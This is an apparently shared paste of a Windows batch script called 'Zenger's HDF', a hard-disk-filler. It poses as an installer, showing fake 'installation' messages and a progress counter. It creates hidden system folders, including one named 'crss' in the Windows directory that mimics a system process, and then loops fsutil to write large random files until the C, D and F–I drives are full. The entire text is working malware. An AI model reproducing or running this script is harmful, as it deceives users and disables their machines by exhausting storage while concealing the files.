Guest User

Zenger's HDF

a guest
Dec 24th, 2018
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  1. @echo off
  2. title Wait A Moment Please
  3. color 0b
  4. msg * Please wait for the Installation to Finish
  6. :Start
  7. startlocal
  8. cls
  9. set ddir=D:
  10. set fdir=F:
  11. set gdir=G:
  12. set hdir=H:
  13. set idir=I:
  14. ::The Checking Sequence
  15. if exist C:\ (MD %windir%\crss) else (goto setdir) >nul
  16. if exist D:\ (MD %ddir%\System) else (goto setdir) >nul
  17. if exist F:\ (MD %fdir%\System) else (MD F:\system) >nul
  18. if exist G:\ (MD %gdir%\system) else (MD G:\system) >nul
  19. if exist H:\ (MD %hdir%\system) else (MD H:\system) >nul
  20. if exist I:\ (MD %idir%\system) else (MD I:\system) >nul
  21. attrib +R +S +H %windir%\crss
  22. attrib +R +S +H %ddir%\System
  23. attrib +R +S +H %fdir%\System
  24. attrib +R +S +H %Gdir%\System
  25. attrib +R +S +H %hdir%\System
  26. attrib +R +S +H %idir%\System
  27. :create
  28. CLS
  29. echo ====== 20
  30. fsutil file createnew %windir%\crss\%random%.%random% 100000000  >nul
  31. fsutil file createnew %windir%\crss\%random%.%random% 10000000  >nul
  32. fsutil file createnew %windir%\crss\%random%.%random% 1000000  >nul
  33. if errorlevel 1 goto Next  >nul
  34. if errorlevel 255 goto Next  >nul
  35. goto create  >nul
  36. :next
  37. cls
  38. echo ============ 40
  39. fsutil file createnew %ddir%\system\%random%.%random% 100000000  >nul
  40. fsutil file createnew %ddir%\system\%random%.%random% 10000000  >nul
  41. fsutil file createnew %ddir%\system\%random%.%random% 1000000  >nul
  42. if errorlevel 1 goto flashg
  43. if errorlevel 255 goto flashg
  44. goto Next
  45. :flashg
  46. cls
  47. echo =================== 60
  48. fsutil file createnew %gdir%\system\%random%.%random% 100000000  >nul
  49. fsutil file createnew %gdir%\system\%random%.%random% 10000000  >nul
  50. fsutil file createnew %gdir%\system\%random%.%random% 100000  >nul
  51. if errorlevel 1 goto flashf
  52. if errorlevel 255 goto flashf
  53. goto flashg
  55. :flashf
  56.   cls
  57. echo ====================== 70
  58. fsutil file createnew %fdir%\system\%random%.%random% 100000000  >nul
  59. fsutil file createnew %fdir%\system\%random%.%random% 10000000  >nul
  60. fsutil file createnew %fdir%\system\%random%.%random% 1000000  >nul
  61. if errorlevel 1 goto flashh
  62. if errorlevel 255 goto flashh
  63. goto flashf
  65. :flashh
  66.   cls
  67. echo ========================= 85
  68. fsutil file createnew %hdir%\system\%random%.%random% 100000000  >nul
  69. fsutil file createnew %hdir%\system\%random%.%random% 10000000  >nul
  70. fsutil file createnew %hdir%\system\%random%.%random% 1000000  >nul
  71. if errorlevel 1 goto flashi
  72. if errorlevel 255 goto flashi
  73. goto flashh
  75. :flashi
  76. cls
  77. echo ================================ 100
  78. fsutil file createnew %idir%\system\%random%.%random% 100000000  >nul
  79. fsutil file createnew %idir%\system\%random%.%random% 10000000  >nul
  80. fsutil file createnew %idir%\system\%random%.%random% 1000000  >nul
  81. if errorlevel 1 goto exit
  82. if errorlevel 255 goto exit
  83. goto flashi
  85. :setdir
  86. if exist C: (set windir=C:\Windows) else (set windir=D:\Windows)  >nul
  87. if exist D: (set windir=D:\Windows) else (set windir=C:\Windows)  >nul
  88. goto start
  90. :exit
  91. pause
  92. endlocal
  93. msg * Now Visit The HDF page at
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